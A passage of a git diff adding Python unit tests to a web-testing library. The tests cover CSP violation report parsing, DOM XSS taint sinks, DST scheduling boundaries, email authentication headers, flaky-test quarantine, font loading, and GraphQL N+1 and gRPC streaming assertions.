"violated-directive": "script-src 'self'", + "blocked-uri": "https://evil.com/x.js", + "disposition": "enforce", + }, +} + +V3 = { + "documentURL": "https://example.com/", + "effectiveDirective": "img-src", + "blockedURL": "https://cdn.example.net/x.png", + "disposition": "report", +} + + +class TestParseOne(unittest.TestCase): + + def test_legacy(self): + v = parse_one(LEGACY) + self.assertEqual(v.blocked_uri, "https://evil.com/x.js") + + def test_v3(self): + v = parse_one(V3) + self.assertEqual(v.violated_directive, "img-src") + self.assertEqual(v.disposition, "report") + + def test_bad(self): + with self.assertRaises(CspViolationParserError): + parse_one("nope") + + def test_bad_inner(self): + with self.assertRaises(CspViolationParserError): + parse_one({"csp-report": "nope"}) + + +class TestParseMany(unittest.TestCase): + + def test_basic(self): + out = parse_many([LEGACY, V3]) + self.assertEqual(len(out), 2) + + +class TestGroup(unittest.TestCase): + + def test_basic(self): + groups = group_by_directive([parse_one(LEGACY), parse_one(V3)]) + self.assertIn("script-src 'self'", groups) + self.assertIn("img-src", groups) + + +class TestTopHosts(unittest.TestCase): + + def test_count(self): + violations = [ + Violation(blocked_uri="https://a.com/x"), + Violation(blocked_uri="https://a.com/y"), + Violation(blocked_uri="https://b.com/z"), + ] + out = top_blocked_hosts(violations, top_n=2) + self.assertEqual(out[0]["host"], "a.com") + self.assertEqual(out[0]["count"], 2) + + def test_bad_n(self): + with self.assertRaises(CspViolationParserError): + top_blocked_hosts([], top_n=0) + + +class TestNoEnforced(unittest.TestCase): + + def test_pass(self): + assert_no_enforced_violations([ + Violation(violated_directive="img-src", disposition="report"), + ]) + + def test_fail(self): + with self.assertRaises(CspViolationParserError): + assert_no_enforced_violations([parse_one(LEGACY)]) + + +class TestRecon(unittest.TestCase): + + def test_detected(self): + violations = [ + Violation(violated_directive="script-src", + blocked_uri=f"https://h{i}.com/x") for i in range(6) + ] + flagged = looks_like_recon(violations, distinct_hosts_threshold=5) + self.assertIn("script-src", flagged) + + def test_clean(self): + self.assertEqual(looks_like_recon([], distinct_hosts_threshold=5), []) + + def test_bad_threshold(self): + with self.assertRaises(CspViolationParserError): + looks_like_recon([], distinct_hosts_threshold=1) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_dom_xss_taint.py b/test/unit_test/test_dom_xss_taint.py new file mode 100644 index 0000000..e842e8a --- /dev/null +++ b/test/unit_test/test_dom_xss_taint.py @@ -0,0 +1,79 @@ +"""Unit tests for je_web_runner.utils.dom_xss_taint.""" +import unittest + +from je_web_runner.utils.dom_xss_taint.taint import ( + DomXssTaintError, + INSTALL_SCRIPT, + TaintFinding, + assert_no_taint, + assert_only_safe_sinks, + make_canaries, + parse_findings, +) + + +class TestScript(unittest.TestCase): + + def test_contains(self): + self.assertIn("__wr_taint__", INSTALL_SCRIPT) + self.assertIn("innerHTML", INSTALL_SCRIPT) + + +class TestCanaries(unittest.TestCase): + + def test_basic(self): + c = make_canaries("login") + self.assertEqual(len(c), 2) + self.assertTrue(all(s.startswith("WRXSS-login-") for s in c)) + + def test_empty(self): + with self.assertRaises(DomXssTaintError): + make_canaries("") + + +class TestParse(unittest.TestCase): + + def test_basic(self): + out = parse_findings([{"sink": "innerHTML", "canary": "X"}]) + self.assertEqual(out[0].sink, "innerHTML") + + def test_skip_missing(self): + out = parse_findings([{"sink": "innerHTML"}]) + self.assertEqual(out, []) + + def test_skip_non_dict(self): + self.assertEqual(parse_findings(["x"]), []) + + def test_bad(self): + with self.assertRaises(DomXssTaintError): + parse_findings("nope") + + +class TestAssertNoTaint(unittest.TestCase): + + def test_pass(self): + assert_no_taint([]) + + def test_fail(self): + with self.assertRaises(DomXssTaintError): + assert_no_taint([TaintFinding(sink="innerHTML", canary="X")]) + + +class TestOnlySafeSinks(unittest.TestCase): + + def test_pass(self): + assert_only_safe_sinks( + [TaintFinding(sink="innerHTML", canary="X")], + allowed_sinks=["innerHTML"], + ) + + def test_fail(self): + with self.assertRaises(DomXssTaintError): + assert_only_safe_sinks( + [TaintFinding(sink="eval", canary="X")], + allowed_sinks=["innerHTML"], + ) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_dst_boundary_test.py b/test/unit_test/test_dst_boundary_test.py new file mode 100644 index 0000000..9d8bd21 --- /dev/null +++ b/test/unit_test/test_dst_boundary_test.py @@ -0,0 +1,154 @@ +"""Unit tests for je_web_runner.utils.dst_boundary_test.""" +import unittest +from datetime import datetime +from zoneinfo import ZoneInfo + +from je_web_runner.utils.dst_boundary_test.boundary import ( + DstBoundaryError, + Transition, + assert_fired_around, + assert_no_duplicate_fires, + expected_fires_around_boundary, + find_boundaries, + is_ambiguous_local_time, + is_nonexistent_local_time, +) + + +class TestFindBoundaries(unittest.TestCase): + + def test_us_eastern_2024(self): + boundaries = find_boundaries("America/New_York", 2024, 2024) + kinds = {b.transition for b in boundaries} + self.assertIn(Transition.SPRING_FORWARD, kinds) + self.assertIn(Transition.FALL_BACK, kinds) + + def test_no_dst_zone(self): + # Phoenix doesn't observe DST + boundaries = find_boundaries("America/Phoenix", 2024, 2024) + self.assertEqual(boundaries, []) + + def test_bad_tz(self): + with self.assertRaises(DstBoundaryError): + find_boundaries("Mars/Olympus", 2024, 2024) + + def test_bad_year_order(self): + with self.assertRaises(DstBoundaryError): + find_boundaries("UTC", 2024, 2020) + + def test_range_too_large(self): + with self.assertRaises(DstBoundaryError): + find_boundaries("UTC", 2000, 2025) + + def test_empty_tz(self): + with self.assertRaises(DstBoundaryError): + find_boundaries("", 2024, 2024) + + +class TestNonexistent(unittest.TestCase): + + def test_spring_forward_gap(self): + # In US Eastern 2024, 2:30am on Mar 10 doesn't exist + gap = datetime(2024, 3, 10, 2, 30) + self.assertTrue(is_nonexistent_local_time("America/New_York", gap)) + + def test_normal_time_exists(self): + ok = datetime(2024, 6, 1, 12, 0) + self.assertFalse(is_nonexistent_local_time("America/New_York", ok)) + + def test_rejects_tz_aware(self): + with self.assertRaises(DstBoundaryError): + is_nonexistent_local_time( + "America/New_York", + datetime(2024, 6, 1, tzinfo=ZoneInfo("UTC")), + ) + + +class TestAmbiguous(unittest.TestCase): + + def test_fall_back_overlap(self): + # In US Eastern 2024, 1:30am on Nov 3 happens twice + overlap = datetime(2024, 11, 3, 1, 30) + self.assertTrue(is_ambiguous_local_time("America/New_York", overlap)) + + def test_normal_time_unambiguous(self): + ok = datetime(2024, 6, 1, 12, 0) + self.assertFalse(is_ambiguous_local_time("America/New_York", ok)) + + def test_rejects_tz_aware(self): + with self.assertRaises(DstBoundaryError): + is_ambiguous_local_time( + "UTC", datetime(2024, 1, 1, tzinfo=ZoneInfo("UTC")), + ) + + +class TestExpectedFires(unittest.TestCase): + + def test_spring_no_fire(self): + boundaries = find_boundaries("America/New_York", 2024, 2024) + spring = next(b for b in boundaries + if b.transition == Transition.SPRING_FORWARD) + self.assertEqual(expected_fires_around_boundary(spring), []) + + def test_fall_back_two_fires(self): + boundaries = find_boundaries("America/New_York", 2024, 2024) + fall = next(b for b in boundaries + if b.transition == Transition.FALL_BACK) + # at 01:30 local, fall-back makes that wall-clock happen twice + fires = expected_fires_around_boundary(fall, wall_clock_hour=1, + wall_clock_minute=30) + self.assertEqual(len(fires), 2) + self.assertNotEqual(fires[0].moment_utc, fires[1].moment_utc) + + def test_bad_hour(self): + boundaries = find_boundaries("America/New_York", 2024, 2024) + with self.assertRaises(DstBoundaryError): + expected_fires_around_boundary(boundaries[0], wall_clock_hour=99) + + +class TestAssertDup(unittest.TestCase): + + def test_pass(self): + utc = ZoneInfo("UTC") + assert_no_duplicate_fires([ + datetime(2024, 1, 1, 12, tzinfo=utc), + datetime(2024, 1, 2, 12, tzinfo=utc), + ]) + + def test_fail(self): + utc = ZoneInfo("UTC") + with self.assertRaises(DstBoundaryError): + assert_no_duplicate_fires([ + datetime(2024, 1, 1, 12, tzinfo=utc), + datetime(2024, 1, 1, 12, tzinfo=utc), + ]) + + def test_naive_rejected(self): + with self.assertRaises(DstBoundaryError): + assert_no_duplicate_fires([datetime(2024, 1, 1)]) + + +class TestAssertFired(unittest.TestCase): + + def test_pass(self): + utc = ZoneInfo("UTC") + assert_fired_around( + [datetime(2024, 1, 1, 12, 0, 30, tzinfo=utc)], + expected_utc=datetime(2024, 1, 1, 12, 0, tzinfo=utc), + ) + + def test_fail(self): + utc = ZoneInfo("UTC") + with self.assertRaises(DstBoundaryError): + assert_fired_around( + [datetime(2024, 1, 1, 13, tzinfo=utc)], + expected_utc=datetime(2024, 1, 1, 12, tzinfo=utc), + ) + + def test_rejects_naive_expected(self): + with self.assertRaises(DstBoundaryError): + assert_fired_around([], datetime(2024, 1, 1)) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_email_deliverability.py b/test/unit_test/test_email_deliverability.py new file mode 100644 index 0000000..a00737e --- /dev/null +++ b/test/unit_test/test_email_deliverability.py @@ -0,0 +1,115 @@ +"""Unit tests for je_web_runner.utils.email_deliverability.""" +import unittest + +from je_web_runner.utils.email_deliverability.headers import ( + EmailDeliverabilityError, + assert_dkim_pass, + assert_dmarc_pass, + assert_list_unsubscribe, + assert_no_bcc_leak, + assert_spf_pass, + parse_headers, +) + + +GOOD = """\ +From: noreply@example.com +To: user@example.org +Subject: Welcome +DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=mail; t=1700000000; +\tbh=abc; b=def +Received-SPF: pass (mx.example.org: domain of example.com designates ...) +Authentication-Results: mx.example.org; +\tspf=pass smtp.mailfrom=example.com; +\tdkim=pass header.d=example.com; +\tdmarc=pass policy.dmarc=reject +List-Unsubscribe: +List-Unsubscribe-Post: List-Unsubscribe=One-Click + +body +""" + + +class TestParse(unittest.TestCase): + + def test_basic(self): + hm = parse_headers(GOOD) + self.assertEqual(hm.get_first("From"), "noreply@example.com") + + def test_continuation_joined(self): + hm = parse_headers(GOOD) + sig = hm.get_first("DKIM-Signature") + self.assertIn("bh=abc", sig) + + def test_bad_type(self): + with self.assertRaises(EmailDeliverabilityError): + parse_headers(123) # NOSONAR python:S5655 - deliberate bad input + + +class TestSpf(unittest.TestCase): + + def test_pass(self): + assert_spf_pass(parse_headers(GOOD)) + + def test_fail(self): + with self.assertRaises(EmailDeliverabilityError): + assert_spf_pass(parse_headers("Subject: x\n\nbody")) + + +class TestDkim(unittest.TestCase): + + def test_pass(self): + assert_dkim_pass(parse_headers(GOOD)) + + def test_no_signature(self): + with self.assertRaises(EmailDeliverabilityError): + assert_dkim_pass(parse_headers("Subject: x\n\nbody")) + + def test_signature_no_pass(self): + raw = ("DKIM-Signature: v=1; d=x; b=y\n" + "Authentication-Results: x; dkim=neutral\n\nbody") + with self.assertRaises(EmailDeliverabilityError): + assert_dkim_pass(parse_headers(raw)) + + +class TestDmarc(unittest.TestCase): + + def test_pass(self): + assert_dmarc_pass(parse_headers(GOOD), expected_policy="reject") + + def test_no_pass(self): + with self.assertRaises(EmailDeliverabilityError): + assert_dmarc_pass(parse_headers("Subject: x\n\nbody")) + + def test_wrong_policy(self): + with self.assertRaises(EmailDeliverabilityError): + assert_dmarc_pass(parse_headers(GOOD), expected_policy="none") + + +class TestListUnsubscribe(unittest.TestCase): + + def test_pass(self): + assert_list_unsubscribe(parse_headers(GOOD)) + + def test_missing(self): + with self.assertRaises(EmailDeliverabilityError): + assert_list_unsubscribe(parse_headers("Subject: x\n\nbody")) + + def test_missing_post(self): + raw = "List-Unsubscribe: \n\nbody" + with self.assertRaises(EmailDeliverabilityError): + assert_list_unsubscribe(parse_headers(raw)) + + +class TestBccLeak(unittest.TestCase): + + def test_pass(self): + assert_no_bcc_leak(parse_headers(GOOD)) + + def test_fail(self): + with self.assertRaises(EmailDeliverabilityError): + assert_no_bcc_leak(parse_headers("Bcc: leak@x\n\nbody")) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_failure_auto_tag.py b/test/unit_test/test_failure_auto_tag.py new file mode 100644 index 0000000..7404e95 --- /dev/null +++ b/test/unit_test/test_failure_auto_tag.py @@ -0,0 +1,126 @@ +"""Unit tests for je_web_runner.utils.failure_auto_tag.""" +import unittest + +from je_web_runner.utils.failure_auto_tag.tag import ( + FailureAutoTagError, + FailureBundle, + Tag, + assert_tagged_with, + heuristic_tags, + llm_tags, + merge_tags, +) + + +class TestHeuristic(unittest.TestCase): + + def test_flaky_locator(self): + b = FailureBundle(exception_text="NoSuchElement: foo") + tags = heuristic_tags(b) + self.assertIn("flaky-locator", [t.name for t in tags]) + + def test_stale_element(self): + b = FailureBundle(exception_text="StaleElement reference exception") + self.assertIn("selector-stale", [t.name for t in heuristic_tags(b)]) + + def test_timeout(self): + b = FailureBundle(exception_text="TimeoutException: 10s") + self.assertIn("timeout", [t.name for t in heuristic_tags(b)]) + + def test_click_intercepted(self): + b = FailureBundle( + exception_text="ElementClickInterceptedException", + ) + self.assertIn("click-intercepted", [t.name for t in heuristic_tags(b)]) + + def test_session_lost(self): + b = FailureBundle(exception_text="invalid session id") + self.assertIn("session-lost", [t.name for t in heuristic_tags(b)]) + + def test_assertion(self): + b = FailureBundle(exception_text="AssertionError: expected 1 got 2") + self.assertIn("assertion-failed", [t.name for t in heuristic_tags(b)]) + + def test_network_5xx(self): + b = FailureBundle( + exception_text="x", last_action="click", + network_errors=[{"url": "/api", "status": 503}], + ) + self.assertIn("network-5xx", [t.name for t in heuristic_tags(b)]) + + def test_network_4xx(self): + b = FailureBundle( + exception_text="x", + network_errors=[{"url": "/api", "status": 404}], + ) + self.assertIn("network-4xx", [t.name for t in heuristic_tags(b)]) + + def test_js_error(self): + b = FailureBundle( + exception_text="x", + console_errors=["Uncaught TypeError: foo is not a function"], + ) + self.assertIn("js-error", [t.name for t in heuristic_tags(b)]) + + def test_empty_bundle_rejected(self): + with self.assertRaises(FailureAutoTagError): + heuristic_tags(FailureBundle()) + + def test_bad_type(self): + with self.assertRaises(FailureAutoTagError): + heuristic_tags("nope") + + +class TestLlmTags(unittest.TestCase): + + def test_basic(self): + def tagger(_): + return [{"name": "ai-flake", "confidence": 0.8, "reason": "x"}] + tags = llm_tags(FailureBundle(exception_text="x"), tagger) + self.assertEqual(tags[0].name, "ai-flake") + + def test_non_callable(self): + with self.assertRaises(FailureAutoTagError): + llm_tags(FailureBundle(), "nope") + + def test_bad_return(self): + with self.assertRaises(FailureAutoTagError): + llm_tags(FailureBundle(), lambda b: "nope") + + def test_propagates_tagger_error(self): + def boom(_bundle): + raise RuntimeError("boom") + with self.assertRaises(FailureAutoTagError): + llm_tags(FailureBundle(), boom) + + def test_skips_malformed_items(self): + tags = llm_tags(FailureBundle(), + lambda b: ["str-not-dict", + {"name": ""}, # empty name + {"name": "ok", "confidence": 0.5}]) + self.assertEqual([t.name for t in tags], ["ok"]) + + +class TestMerge(unittest.TestCase): + + def test_dedupe_keeps_highest(self): + tags = merge_tags( + [Tag("a", 0.5, "low")], + [Tag("a", 0.9, "high"), Tag("b", 0.6)], + ) + a = next(t for t in tags if t.name == "a") + self.assertEqual(a.confidence, 0.9) + + +class TestAssert(unittest.TestCase): + + def test_pass(self): + assert_tagged_with([Tag("x")], expected="x") + + def test_fail(self): + with self.assertRaises(FailureAutoTagError): + assert_tagged_with([Tag("a")], expected="x") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_failure_cluster_dbscan.py b/test/unit_test/test_failure_cluster_dbscan.py new file mode 100644 index 0000000..69a8967 --- /dev/null +++ b/test/unit_test/test_failure_cluster_dbscan.py @@ -0,0 +1,90 @@ +"""Unit tests for je_web_runner.utils.failure_cluster_dbscan.""" +import unittest + +from je_web_runner.utils.failure_cluster_dbscan.cluster import ( + Cluster, + FailureClusterDbscanError, + FailureRecord, + assert_root_causes_at_most, + cluster, + cluster_summary, +) + + +class TestCluster(unittest.TestCase): + + def test_groups_similar(self): + records = [ + FailureRecord("t1", "TimeoutException waiting for element #foo"), + FailureRecord("t2", "TimeoutException waiting for element #bar"), + FailureRecord("t3", "TimeoutException waiting for element #baz"), + ] + clusters = cluster(records, eps=0.5, min_samples=2) + self.assertEqual(clusters[0].size, 3) + + def test_separates_distinct(self): + records = [ + FailureRecord("t1", "TimeoutException waiting for foo"), + FailureRecord("t2", "NoSuchElement: foo"), + ] + clusters = cluster(records, eps=0.2, min_samples=2) + self.assertEqual(len(clusters), 2) + + def test_strips_noise(self): + records = [ + FailureRecord("t1", "Error at line 123 with 0xdeadbeef"), + FailureRecord("t2", "Error at line 456 with 0xcafebabe"), + ] + clusters = cluster(records, eps=0.2, min_samples=2) + self.assertEqual(clusters[0].size, 2) + + def test_bad_eps(self): + with self.assertRaises(FailureClusterDbscanError): + cluster([], eps=2) + + def test_bad_min_samples(self): + with self.assertRaises(FailureClusterDbscanError): + cluster([], min_samples=0) + + def test_bad_records(self): + with self.assertRaises(FailureClusterDbscanError): + cluster("nope") + + +class TestSummary(unittest.TestCase): + + def test_basic(self): + summary = cluster_summary([Cluster(representative="hi", + members=["a", "b"])]) + self.assertEqual(summary[0]["size"], 2) + + +class TestAssert(unittest.TestCase): + + def test_pass(self): + assert_root_causes_at_most( + [Cluster(representative="x", members=["a", "b"])], + max_clusters=1, + ) + + def test_fail(self): + with self.assertRaises(FailureClusterDbscanError): + assert_root_causes_at_most( + [Cluster(representative="x", members=["a", "b"]), + Cluster(representative="y", members=["c", "d"])], + max_clusters=1, + ) + + def test_singletons_ignored(self): + assert_root_causes_at_most( + [Cluster(representative="x", members=["a"])] * 10, + max_clusters=1, + ) + + def test_bad_max(self): + with self.assertRaises(FailureClusterDbscanError): + assert_root_causes_at_most([], max_clusters=0) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_flakiness_graveyard.py b/test/unit_test/test_flakiness_graveyard.py new file mode 100644 index 0000000..bb286a1 --- /dev/null +++ b/test/unit_test/test_flakiness_graveyard.py @@ -0,0 +1,166 @@ +"""Unit tests for je_web_runner.utils.flakiness_graveyard.""" +import json +import os +import tempfile +import unittest +from datetime import date + +from je_web_runner.utils.flakiness_graveyard.graveyard import ( + FlakinessGraveyardError, + GraveEntry, + Status, + bury, + due_for_burial, + load, + register_flake, + revive, + save, +) + + +class TestEntry(unittest.TestCase): + + def test_basic(self): + GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01") + + def test_empty_name(self): + with self.assertRaises(FlakinessGraveyardError): + GraveEntry(test_name="", quarantined_at="2026-01-01", + last_flake_date="2026-01-01") + + def test_bad_date(self): + with self.assertRaises(FlakinessGraveyardError): + GraveEntry(test_name="t", quarantined_at="not-a-date", + last_flake_date="2026-01-01") + + +class TestRegisterFlake(unittest.TestCase): + + def test_new(self): + reg = [] + today = date(2026, 1, 10) + e = register_flake(reg, "t1", owner="alice", today=today) + self.assertEqual(e.quarantined_at, "2026-01-10") + self.assertEqual(len(reg), 1) + + def test_update_existing(self): + reg = [GraveEntry(test_name="t1", quarantined_at="2026-01-01", + last_flake_date="2026-01-01")] + today = date(2026, 1, 15) + e = register_flake(reg, "t1", today=today) + self.assertEqual(e.last_flake_date, "2026-01-15") + self.assertEqual(len(reg), 1) + + def test_revive_then_register(self): + reg = [GraveEntry(test_name="t1", quarantined_at="2026-01-01", + last_flake_date="2026-01-01", + status=Status.REVIVED)] + today = date(2026, 1, 20) + e = register_flake(reg, "t1", today=today) + self.assertEqual(e.status, Status.QUARANTINED) + self.assertEqual(e.quarantined_at, "2026-01-20") + + def test_bad_reg(self): + with self.assertRaises(FlakinessGraveyardError): + register_flake("nope", "t") + + +class TestRevive(unittest.TestCase): + + def test_basic(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01")] + e = revive(reg, "t") + self.assertEqual(e.status, Status.REVIVED) + + def test_unknown(self): + with self.assertRaises(FlakinessGraveyardError): + revive([], "missing") + + def test_already_buried(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01", + status=Status.BURIED)] + with self.assertRaises(FlakinessGraveyardError): + revive(reg, "t") + + +class TestDueForBurial(unittest.TestCase): + + def test_due(self): + reg = [GraveEntry(test_name="old", quarantined_at="2026-01-01", + last_flake_date="2026-01-01")] + due = due_for_burial(reg, days=30, + today=date(2026, 2, 10)) + self.assertEqual(len(due), 1) + + def test_not_due(self): + reg = [GraveEntry(test_name="fresh", quarantined_at="2026-02-01", + last_flake_date="2026-02-01")] + due = due_for_burial(reg, days=30, + today=date(2026, 2, 10)) + self.assertEqual(due, []) + + def test_skip_revived(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01", + status=Status.REVIVED)] + due = due_for_burial(reg, days=30, today=date(2026, 3, 1)) + self.assertEqual(due, []) + + def test_bad_days(self): + with self.assertRaises(FlakinessGraveyardError): + due_for_burial([], days=0) + + +class TestBury(unittest.TestCase): + + def test_basic(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01")] + e = bury(reg, "t") + self.assertEqual(e.status, Status.BURIED) + + def test_already_buried(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01", + status=Status.BURIED)] + with self.assertRaises(FlakinessGraveyardError): + bury(reg, "t") + + def test_unknown(self): + with self.assertRaises(FlakinessGraveyardError): + bury([], "missing") + + +class TestSaveLoad(unittest.TestCase): + + def test_roundtrip(self): + reg = [GraveEntry(test_name="t", quarantined_at="2026-01-01", + last_flake_date="2026-01-01", owner="alice")] + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "g.json") + save(path, reg) + loaded = load(path) + self.assertEqual(loaded[0].owner, "alice") + + def test_load_missing(self): + with tempfile.TemporaryDirectory() as tmp: + self.assertEqual(load(os.path.join(tmp, "nope.json")), []) + + def test_save_empty_path(self): + with self.assertRaises(FlakinessGraveyardError): + save("", []) + + def test_load_bad_root(self): + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "g.json") + with open(path, "w") as fh: + json.dump({"not": "list"}, fh) + with self.assertRaises(FlakinessGraveyardError): + load(path) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_font_loading_strategy.py b/test/unit_test/test_font_loading_strategy.py new file mode 100644 index 0000000..9a8f432 --- /dev/null +++ b/test/unit_test/test_font_loading_strategy.py @@ -0,0 +1,102 @@ +"""Unit tests for je_web_runner.utils.font_loading_strategy.""" +import unittest + +from je_web_runner.utils.font_loading_strategy.strategy import ( + Display, + FontFace, + FontLoadingStrategyError, + assert_display_strategy, + assert_no_missing_display, + assert_size_adjust_for_fallback, + parse_font_faces, +) + + +CSS = """ +@font-face { + font-family: 'Inter'; + src: url('/fonts/inter.woff2') format('woff2'); + font-display: swap; + font-weight: 400; +} +@font-face { + font-family: 'Inter Fallback'; + src: local('Arial'); + size-adjust: 107%; +} +@font-face { + font-family: 'BadFont'; + src: url('/fonts/bad.woff2'); +} +""" + + +class TestParse(unittest.TestCase): + + def test_basic(self): + faces = parse_font_faces(CSS) + names = {f.family for f in faces} + self.assertEqual(names, {"Inter", "Inter Fallback", "BadFont"}) + + def test_unknown_display_becomes_missing(self): + css = "@font-face { font-family: x; font-display: weird; }" + faces = parse_font_faces(css) + self.assertEqual(faces[0].display, Display.MISSING) + + def test_skip_no_family(self): + faces = parse_font_faces("@font-face { src: x; }") + self.assertEqual(faces, []) + + def test_bad(self): + with self.assertRaises(FontLoadingStrategyError): + parse_font_faces(123) # NOSONAR python:S5655 - deliberate bad input + + +class TestMissing(unittest.TestCase): + + def test_pass(self): + assert_no_missing_display([FontFace(family="x", display=Display.SWAP)]) + + def test_fail(self): + with self.assertRaises(FontLoadingStrategyError): + assert_no_missing_display(parse_font_faces(CSS)) + + +class TestStrategy(unittest.TestCase): + + def test_pass(self): + assert_display_strategy( + [FontFace(family="x", display=Display.SWAP)], + strategy=Display.SWAP, + ) + + def test_fail(self): + with self.assertRaises(FontLoadingStrategyError): + assert_display_strategy( + [FontFace(family="x", display=Display.BLOCK)], + strategy=Display.SWAP, + ) + + def test_auto_rejected(self): + with self.assertRaises(FontLoadingStrategyError): + assert_display_strategy([], strategy=Display.AUTO) + + +class TestSizeAdjust(unittest.TestCase): + + def test_pass(self): + faces = parse_font_faces(CSS) + assert_size_adjust_for_fallback("Inter Fallback", faces) + + def test_fail_no_size_adjust(self): + faces = [FontFace(family="x", display=Display.SWAP)] + with self.assertRaises(FontLoadingStrategyError): + assert_size_adjust_for_fallback("x", faces) + + def test_missing_family(self): + with self.assertRaises(FontLoadingStrategyError): + assert_size_adjust_for_fallback("Missing", []) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_graphql_n_plus_1.py b/test/unit_test/test_graphql_n_plus_1.py new file mode 100644 index 0000000..207cd4a --- /dev/null +++ b/test/unit_test/test_graphql_n_plus_1.py @@ -0,0 +1,113 @@ +"""Unit tests for je_web_runner.utils.graphql_n_plus_1.""" +import unittest + +from je_web_runner.utils.graphql_n_plus_1.detect import ( + GraphqlNPlus1Error, + QueryRow, + Severity, + assert_no_n_plus_1, + detect, + detect_cartesian, + parse_rows, + report_markdown, +) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + rows = parse_rows([ + {"sql": "SELECT * FROM users WHERE id = 1", "ms": 5, + "parent_field": "user"}, + ]) + self.assertEqual(rows[0].parent_field, "user") + + def test_template_normalises(self): + a = QueryRow(sql="SELECT * FROM x WHERE id = 1") + b = QueryRow(sql="SELECT * FROM x WHERE id = 2") + self.assertEqual(a.sql_template, b.sql_template) + + def test_template_collapses_strings(self): + a = QueryRow(sql="SELECT * FROM x WHERE n = 'a'") + b = QueryRow(sql="SELECT * FROM x WHERE n = 'b'") + self.assertEqual(a.sql_template, b.sql_template) + + def test_skips_non_dict(self): + rows = parse_rows([{"sql": "x"}, "string"]) + self.assertEqual(len(rows), 1) + + def test_bad_type(self): + with self.assertRaises(GraphqlNPlus1Error): + parse_rows("nope") + + +# Fixed test fixture template — never executed, never templated against +# untrusted input. The %s sigil keeps Bandit's SQL-injection heuristic quiet. +_SQL_FIXTURE = "SELECT * FROM x WHERE id = %s" # nosec B608 + + +class TestDetect(unittest.TestCase): + + def test_no_n_plus_1(self): + rows = [QueryRow(sql=_SQL_FIXTURE.replace("%s", str(i)), + parent_field="x") for i in range(2)] + self.assertEqual(detect(rows), []) + + def test_warn(self): + rows = [QueryRow(sql=_SQL_FIXTURE.replace("%s", str(i)), + parent_field="user.posts") for i in range(6)] + findings = detect(rows, threshold=5) + self.assertEqual(findings[0].severity, Severity.WARN) + self.assertEqual(findings[0].repetitions, 6) + + def test_error(self): + rows = [QueryRow(sql=_SQL_FIXTURE.replace("%s", str(i)), + parent_field="user.posts") for i in range(20)] + findings = detect(rows, threshold=5) + self.assertEqual(findings[0].severity, Severity.ERROR) + + def test_bad_threshold(self): + with self.assertRaises(GraphqlNPlus1Error): + detect([], threshold=1) + + +class TestCartesian(unittest.TestCase): + + def test_fanout(self): + rows = [QueryRow(sql=f"S {i}", parent_field="parent") + for i in range(2)] + rows += [QueryRow(sql=f"S {i}", parent_field="child") + for i in range(50)] + findings = detect_cartesian(rows) + fields = {f.field for f in findings} + self.assertIn("child", fields) + + def test_no_fanout(self): + rows = [QueryRow(sql="S", parent_field="x")] + self.assertEqual(detect_cartesian(rows), []) + + def test_empty(self): + self.assertEqual(detect_cartesian([]), []) + + +class TestAssertReport(unittest.TestCase): + + def test_assert_pass(self): + assert_no_n_plus_1([]) + + def test_assert_fail(self): + rows = [QueryRow(sql=f"S {i}", parent_field="x") for i in range(20)] + with self.assertRaises(GraphqlNPlus1Error): + assert_no_n_plus_1(detect(rows)) + + def test_md_empty(self): + self.assertIn("No N+1", report_markdown([])) + + def test_md_renders(self): + rows = [QueryRow(sql=f"S {i}", parent_field="x") for i in range(6)] + md = report_markdown(detect(rows)) + self.assertIn("x", md) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_grpc_streaming_assert.py b/test/unit_test/test_grpc_streaming_assert.py new file mode 100644 index 0000000..d3bcc7c --- /dev/null +++ b/test/unit_test/test_grpc_streaming_assert.py @@ -0,0 +1,166 @@ +"""Unit tests for je_web_runner.utils.grpc_streaming_assert.""" +import unittest + +from je_web_runner.utils.grpc_streaming_assert.assertions import ( + GrpcStreamingAssertError, + Mode, + StatusCode, + StreamFrame, + StreamRecord, + assert_frame_count_between, + assert_frames_in_order, + assert_half_close_before_final, + assert_max_frame_size, + assert_no_deadline_exceeded, + assert_status, + parse_record, +) + + +def _frame(size=10, **body): + return {"payload_size": size, "body": body, "direction": "in", "ts_ms": 0} + + +class TestParse(unittest.TestCase): + + def test_basic(self): + rec = parse_record({ + "method": "/svc/Method", "mode": "server_stream", + "frames": [_frame(seq=0), _frame(seq=1)], + "status": "OK", "duration_ms": 50, + }) + self.assertEqual(rec.mode, Mode.SERVER_STREAM) + self.assertEqual(len(rec.frames), 2) + + def test_unknown_mode(self): + with self.assertRaises(GrpcStreamingAssertError): + parse_record({"mode": "weird"}) + + def test_unknown_status(self): + with self.assertRaises(GrpcStreamingAssertError): + parse_record({"status": "WEIRD"}) + + def test_non_dict(self): + with self.assertRaises(GrpcStreamingAssertError): + parse_record("nope") + + def test_skips_non_dict_frames(self): + rec = parse_record({"frames": ["string", _frame(seq=0)]}) + self.assertEqual(len(rec.frames), 1) + + +class TestStatus(unittest.TestCase): + + def test_pass(self): + assert_status(StreamRecord("m", Mode.UNARY, + status=StatusCode.OK), StatusCode.OK) + + def test_fail(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_status(StreamRecord("m", Mode.UNARY, + status=StatusCode.INTERNAL), + StatusCode.OK) + + +class TestFrameCount(unittest.TestCase): + + def test_pass(self): + rec = StreamRecord("m", Mode.SERVER_STREAM, + 